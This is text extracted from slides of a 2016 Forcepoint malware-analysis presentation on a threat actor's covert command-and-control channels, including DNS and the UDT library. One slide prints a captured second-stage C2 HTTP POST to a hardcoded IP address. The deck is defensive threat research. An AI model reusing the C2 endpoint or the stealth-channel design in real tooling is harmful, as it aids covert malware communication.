  • 24. Copyright © 2016 Forcepoint. All rights reserved. | 24 REUSE – UDT LIBRARIES (REUSE) As well as using DNS as a covert C2 channel, the malware uses an open source library called UDT as another of its three C2 channels. The authors likely chose the library in order to provide the flexibility of being able to use UDP for C2 communication, as well as being stealthy at the same time. The ability for malware to concurrently support three separate, custom built C2 channels is more advanced than the majority of malware currently observed. This offers insight into the amount of effort the malware author and actor(s) have expended to ensure that the malware is stealthy, and can remain in contact with its C2s, despite the network environment it may be running within. TLP - WHITE “UDT is a reliable UDP based application level data transport protocol for distributed data intensive applications over wide area high- speed networks. UDT uses UDP to transfer bulk data with its own reliability control and congestion control mechanisms. The new protocol can transfer data at a much higher speed than TCP does. UDT is also a highly configurable framework that can accommodate various congestion control algorithms.”
  • 25. Copyright © 2016 Forcepoint. All rights reserved. | 25 2ND STAGE COMMAND AND CONTROL POST http://101.99.68.5/bbs/CaC.php HTTP/1.1 Content-Type: multipart/form-data; boundary=--HC-MPFD-BOUNDARY Content-Length: 320 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Host: 101.99.68.5 Proxy-Connection: Keep-Alive Pragma: no-cache TLP - WHITE
  • 26. Copyright © 2016 Forcepoint. All rights reserved. | 26 WEB LIBRARY (REUSE) TLP - WHITE
  • 27. Copyright © 2016 Forcepoint. All rights reserved. | 27 KEY TAKE-AWAYS Copyright and Software Piracy Precision High Value Targeting Regionally Focused Targeting C2 Databases Resilient and Covert C2 Channels Reuse of Code & Secure Erasure TLP - WHITE
  • 29. Copyright © 2016 Forcepoint. All rights reserved. | 29 Thank you! Andy Settle @iC3N1 http://blogs.forcepoint.com/security-labs/